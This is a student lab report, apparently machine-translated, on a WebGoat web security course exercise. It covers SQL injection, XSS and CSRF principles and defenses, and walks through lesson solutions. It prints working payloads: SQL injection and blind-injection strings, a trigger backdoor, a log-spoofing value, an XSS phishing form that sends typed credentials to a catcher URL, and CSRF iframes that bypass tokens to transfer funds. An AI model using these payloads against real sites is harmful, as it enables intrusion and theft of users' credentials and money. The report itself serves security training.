20154312 Zeng Lin EXP9 web Security Foundation

Directory

-0.webgoat Could not find source file

-1. Answers to basic questions
-2. Environment configuration
-3.injection Flaws
----3.1.Numeric SQL Injection
----3.2.Log Spoofing
----3.3.XPATH Injection
----3.4.String SQL Injection
----3.5.lab:sql Injection
----3.6.Database backdoors
----3.7.Blind Numeric SQL Injection
----3.8.Blind String SQL Injection
-4.cross-site Scripting (XSS)
----4.1.Phishing with XSS
----4.2.Stored XSS Attacks
----4.3.Reflected XSS Attacks
-5.csrf
----5.1.Cross Site Request forgery (CSRF)
----5.2.CSRF Prompt By-Pass
----5.3.CSRF Token By-Pass
-6. Experiment Summary and experience

Webgoat Could not find source file

• Guess the problem is on the JDK version

• Confirm the JDK version of Kali first

• "9.0.4"This version is too high for WebGoat7.1, we just need to change the JDK to 1.8.

• Refer to the tutorial step by step

Basic question Answer

(1) SQL injection attack principle, how to defend

• Principle: The so-called SQL injection attack, which is an attacker inserting SQL commands into the Web form's input domain or page request query string, deceives the server to execute a malicious SQL command. In some forms, user-entered content is used directly to construct (or influence) dynamic SQL commands, or as input parameters to stored procedures, which are particularly susceptible to SQL injection attacks.
• Defense:
• Never trust the user's input. The user's input can be verified by regular expressions, or by limiting the length, by converting the single quotation mark and the double "-".
• Never use dynamically assembled SQL, either using parameterized SQL or directly using stored procedures for data query access.
• Never use a database connection with administrator rights, and use a separate limited database connection for each app.
• Do not store confidential information directly, encrypt or hash out passwords and sensitive information.
• Apply exception information should give as few hints as possible, preferably using a custom error message to wrap the original error message
• SQL injection detection method generally take the aid software or website platform to detect, software generally use SQL injection detection Tool Jsky, website platform has billion think website security platform detection tools. Mdcsoft scan and so on. The use of mdcsoft-ips can effectively protect against SQL injection, XSS attacks and so on.

(2) The principle of XSS attack, how to defend

• Principle: The XSS attack is the Universal cross-site scripting attack, which is for not to be confused with the abbreviation of cascading style sheets (cascading style Sheets, CSS), so the cross-site scripting attack is abbreviated to XSS,XSS as a computer security vulnerability in Web applications. It allows malicious Web users to embed code into pages that are available to other users.
• Defense:
• Feature-based defense: the Unified XSS Defense uses feature-matching, which is checked in all submitted information. For this type of XSS attack, the pattern-matching approach typically requires the keyword "JavaScript" to be retrieved, and once the commit message is found to contain "javascript", it is considered an XSS attack
• Code modification-based defenses: As with SQL injection defense, XSS attacks take advantage of Web page authoring negligence, so there is another way to avoid it from the perspective of Web application development:
  • Reliable input validation of all user submissions, including URLs, query keywords, HTTP headers, post data, and so on, only for the specified length range, in the appropriate format, with the expected character of the content submission, the other is filtered.
  • Implement session markers (session tokens), CAPTCHA system, or HTTP reference header checks to prevent functionality from being performed by third-party Web sites.
  • Verify that the received content is properly normalized and contains only the smallest, safest tags (no javascript), removes any references to remote content (especially stylesheets and JavaScript), and uses HTTP only cookies.

(3) CSRF attack principle, how to defend

• Principle: CSRF (Cross-site request forgery) cross-site requests forgery, also known as "one click Attack" or Session Riding, usually abbreviated to CSRF or XSRF, is a malicious use of the site. Although it sounds like cross-site scripting (XSS), it is very different from XSS, where XSS leverages trusted users within the site, while CSRF leverages trusted sites by disguising requests from trusted users. Compared to XSS attacks, csrf attacks are often less prevalent (and therefore have very few resources to protect against them) and are difficult to guard against, so they are considered more dangerous than XSS.
• Defense:
• For Web sites, switching a persisted authorization method (such as a cookie or HTTP authorization) to an instantaneous authorization method (providing a hidden field in each form) will help the site prevent these attacks. A similar approach is to include the secret information in the form, the user-specified code name as a validation outside of the cookie.
• "Double commit" cookie. This method works only with Ajax requests, but it can be used as a global remediation method without changing a large number of form. If an authorized cookie is being read by the JavaScript code before the form post, then the restriction cross-domain rule will be applied. If the server needs to include a request for an authorization cookie in the POST request body or URL, the request must come from a trusted domain because the other domain cannot read the cookie from the trusting domain.

Environment configuration

• After you download the Java package for webgoat, use the command

java -jar webgoat-server-8.0.0.M14.jarRun Webgoat

• Use your browser to open http://localhost:8080/WebGoat and enter WebGoat

Injection Flawsnumeric SQL Injection

• F12 Open the browser debug mode, by modifying the Columbia corresponding value, so that the last return of the SQL statement into

SELECT * FROM weather_data WHERE station = 101 OR 1=1

• 1=1 is established, you can see all the city weather

Log Spoofing

• Log forgery, in username input

zh%0d%0aLogin Succeeded for username: admin

• %0d and%0a are newline characters, so they forge a Login Succeeded for username: admin log of content
  

XPATH Injection

• Direct construction of Yong-real type

20154312‘ or 1=1 or ‘a‘=‘a

String SQL Injection

• Construct a permanent injection

zenglin‘ or ‘1‘=‘1

• The SQL statement becomes

SELECT * FROM user_data WHERE last_name = ‘zenglin‘ OR ‘1‘=‘1‘

Lab:sql Injection

stage1:string SQL Injection

• This question is a little problem, the input box limits the MaxLength, change the maxlength to a suitable size, modify password=‘ or‘1‘=‘1 , done

Stage3:numeric SQL Injection

• Like Stage1, the construction of the permanent login account, after landing modified employee_id parameters revised to change101 or 1=1 order by salary desc

Database backdoors

• The idea is to use SQL statements to inject a backdoor, the specific operation is ; to fill the original text box into two SQL statements, to achieve the purpose of injecting the backdoor

• First in the User ID input box to 101; CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email=‘[email protected]‘WHERE userid = NEW.userid. implement the implementation of the incoming SQL statement CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email=‘[email protected]‘WHERE userid = NEW.userid. function is to create a new user, the email option will be automatically populated with my designated mailbox

Blind Numeric SQL Injection

• Blind, as the name implies is nothing to know blind note, mainly to see feedback to adjust our input to achieve the effect of SQL injection

• Digital blinds, in the Enter your Account Number input101 AND ((SELECT pin FROM pins WHERE cc_number=‘1111222233334444‘) > 10000 );

• Judging by the return of the hint to “(SELECT pin FROM pins WHERE cc_number=‘1111222233334444‘) > 10000" narrow the scope by the dichotomy, and finally with the 2364 submission of success

Blind String SQL Injection

• The same idea, but this is the string blind, in the Enter your Account Number input 101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number=‘4312431243124312‘), 1, 1) = ‘h‘ ); according to the return prompt to determine the name, the last input JiLL , blasting success

Cross-site Scripting (XSS)

Phishing with XSS

• Xss+html write a simple with a form site, directly put the following code into the input box, enter, a login box appears, input Username and Password then pop-up information about the window

</form>  <script>function hack(){ XSSImage=new Image;XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);}   </script><form name="phish"><br><br><HR>  <H2>This feature requires account login:</H2><br>  <br>Enter Username:<br>  <input type="text" name="user">  <br>Enter Password:<br>  <input type="password" name = "pass"><br>  <input type="submit" name="login" value="login" onclick="hack()"></form><br><br><HR>

Lab:cross Site Scripting

Stage1:

• After logging in, click View profile to Street enter the following code in the field:<script>alert("20154327");</script>

Stage3:

• Use "David" to sign in, and then view "Bruce" information to execute a previously stored cross-site attack script

Stage5: Performing a reflection XSS attack

• Enter in in after login Search Staff“”
  

Stored XSS Attacks

• Memory XSS attack, also the most classic, used to put the script statements into the message box to store, to attack

• The subject is entered directly in the title 任意信息 and lost in the message.<script>alert("20154327yangzhenghui!");</script>

• Then click on the message board content

Reflected XSS Attacks

• In the reflection XSS attack, the script is used to create a URL to submit to another website, to implement the attack, enter the script directly in Enter ur three digit access code , implement the attack

Csrfcross Site Request Forgery (CSRF)

• This is a Send mail page, we only need in the title input 任意信息 , in the message input: Click Submit , Message List will appear a submitted record

CSRF Prompt By-Pass

• Same idea, title input 任意信息 , message input:

<iframe    src="attack?Screen=280&menu=900&transferFunds=5000"    id="myFrame" frameborder="1" marginwidth="0"    marginheight="0" width="800" scrolling=yes height="300"    onload="document.getElementById(‘frame2‘).src=‘attack?Screen=280&menu=900&transferFunds=CONFIRM‘;"></iframe> <iframe    id="frame2" frameborder="1" marginwidth="0"    marginheight="0" width="800" scrolling=yes height="300"></iframe>

CSRF Token By-Pass

• Still the same idea, title input 任意信息 , in the message input code, submit

<script>    var tokensuffix;         function readFrame1()    {        var frameDoc = document.getElementById("frame1").contentDocument;        var form = frameDoc.getElementsByTagName("form")[0];        tokensuffix = ‘&CSRFToken=‘ + form.CSRFToken.value;             loadFrame2();    }         function loadFrame2()    {        var testFrame = document.getElementById("frame2");        testFrame.src="attack?Screen=273&menu=900&transferFunds=5000" + tokensuffix;    }</script> <iframe src="attack?Screen=273&menu=900&transferFunds=main"    onload="readFrame1();"    id="frame1" frameborder="1" marginwidth="0"    marginheight="0" width="800" scrolling=yes height="300"></iframe> <iframe id="frame2" frameborder="1" marginwidth="0"    marginheight="0" width="800" scrolling=yes height="300"></iframe>

Experiment Summary and experience

This is the last experiment, the experiment will be over, but I probably do not see the internet on the end of the network attack on the day, thank the teacher, let me have the opportunity to enjoy a very pure technical course. Thank you!

20154312 Zeng Lin EXP9 web Security Foundation